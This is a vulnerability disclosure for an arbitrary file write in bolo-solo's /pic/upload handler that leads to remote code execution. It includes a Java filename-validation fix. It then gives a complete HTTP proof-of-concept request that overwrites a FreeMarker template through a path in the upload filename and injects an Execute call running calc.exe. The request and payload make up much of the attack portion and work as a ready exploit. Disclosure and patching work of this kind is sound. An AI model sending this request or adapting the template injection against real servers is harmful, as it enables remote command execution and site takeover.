In the bolo-solo v2.6.4_stable version, there is an RCE vulnerability caused by arbitrary file writing in the "/pic/upload" function. The root cause is the lack of security verification of the uploaded file name.
Vulnerability file: src/main/java/org/b3log/solo/bolo/pic/PicUploadProcessor.java
When using the uploadPicture() method for file upload, the lack of security validation on the uploaded file leads to arbitrary file upload, arbitrary file write, and directory traversal. The file is written to the server via item.write(file).

Although the item.delete() method is used to delete the temporary file, it does not affect the file that has already been uploaded and written to the server.
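As an added example (not bolo-solo's own code), this is the kind of filename validation that uploadPicture() lacks before item.write(file): only a plain basename with an allowlisted image extension is accepted, and the stored name is regenerated so the client-supplied name never reaches the filesystem. The upload root, the extension allowlist and the class name are assumptions.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Hypothetical hardening for the /pic/upload handler; not the project's code.
public final class SafePicUpload {
    // Assumed allowlist: the upload endpoint is for pictures only, so no .ftl/.jsp/etc.
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif", "webp");

    /**
     * Returns the path the upload may be written to, or throws if the client-supplied
     * filename is not a plain image name. uploadRoot must already exist.
     */
    public static Path resolveUploadTarget(Path uploadRoot, String clientFileName) throws IOException {
        if (clientFileName == null || clientFileName.isEmpty()) {
            throw new IOException("empty filename");
        }
        // Reject any path component: "/skins/bolo-next/index.ftl" or "..\\x.ftl" must not pass.
        if (clientFileName.contains("/") || clientFileName.contains("\\") || clientFileName.indexOf('\0') >= 0) {
            throw new IOException("path separators are not allowed in filename");
        }
        if (clientFileName.equals(".") || clientFileName.equals("..")) {
            throw new IOException("invalid filename");
        }
        int dot = clientFileName.lastIndexOf('.');
        String ext = dot < 0 ? "" : clientFileName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IOException("extension not allowed: " + ext);
        }
        // Never reuse the client's name on disk: a server-generated name removes the
        // filename from the attacker's control entirely.
        String stored = UUID.randomUUID().toString() + "." + ext;
        Path root = uploadRoot.toRealPath();          // canonical form of the upload directory
        Path target = root.resolve(stored).normalize();
        if (!target.startsWith(root)) {                // defence in depth: must stay under root
            throw new IOException("resolved path escapes upload root");
        }
        return target;
    }
}
```

The handler would then call item.write(target.toFile()) with the returned path instead of a file built from the request's filename; a request like the one in the POC below (filename "/skins/bolo-next/index.ftl") is rejected at the separator check.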

Successfully uploaded:

The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify .ftl template files, leading to RCE. Modify the index.ftl file under the path \bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-next.
Successfully modified the .ftl file.

Changed the skin, accessed the page, and successfully triggered a calculator (RCE).
POC:
POST /pic/upload HTTP/1.1
Host: localhost:8080
Content-Length: 1042
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydUE2vdanfzRJfFxA
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarydUE2vdanfzRJfFxA
Content-Disposition: form-data; name="file"; filename="/skins/bolo-next/index.ftl"
Content-Type: application/x-zip-compressed
<#include "../../common-template/macro-common_head.ftl">
<#include 'header.ftl'>
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("calc.exe")}
<body nonce-data="4fb3a4be0d" class="home blog hfeed chinese-font">
<div class="scrollbar" id="bar">
</div>
<section id="main-container">
<div class="headertop filter-dot">
<#include 'macro-header.ftl'>
<div id="content" class="site-content">
<div id="primary" class="content-area">
<#if pjax><!---- pjax {#pjax} start ----></#if>
<#include "article-list.ftl">
<#if pjax><!---- pjax {#pjax} end ----></#if>
</div>
</div>
</div>
<#include 'macro-footer.ftl'>
</section>
<#include 'side-mobile.ftl'>
<#include 'footer.ftl'>
</body>
</html>
------WebKitFormBoundarydUE2vdanfzRJfFxA--